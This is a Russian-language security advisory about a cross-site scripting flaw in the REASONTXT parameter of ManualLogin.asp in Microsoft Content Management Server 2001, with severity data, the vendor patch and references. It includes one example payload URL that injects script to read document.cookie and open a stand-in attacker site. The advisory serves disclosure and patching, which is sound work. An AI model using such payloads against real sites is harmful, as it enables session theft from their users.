Дата публикации: | 11.10.2002 |
Дата изменения: | 09.03.2009 |
Всего просмотров: | 1012 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Межсайтовый скриптинг |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Microsoft Content Management Server 2001 |
Уязвимые версии: Microsoft Content Management Server 2001
Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметре "REASONTXT" в сценарии ManualLogin.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://www.example.com/NR/System/Access/ManualLogin.asp? REASONTXT=<script>alert(document.cookie);window.open ("http://attacker.site.example.com");</SCRIPT> URL производителя: www.microsoft.com Решение: Установите исправление с сайта производителя. download.microsoft.com/download/5/9/3/5936344a-480c-4343-bcea-b3f6aa25fa23/mcms2001srp2.exe Журнал изменений:
09.03.2009 |
|
Ссылки: |
CSS on Microsoft Content Management Server MS03-002: Cumulative Patch for Microsoft Content Management Server (810487) |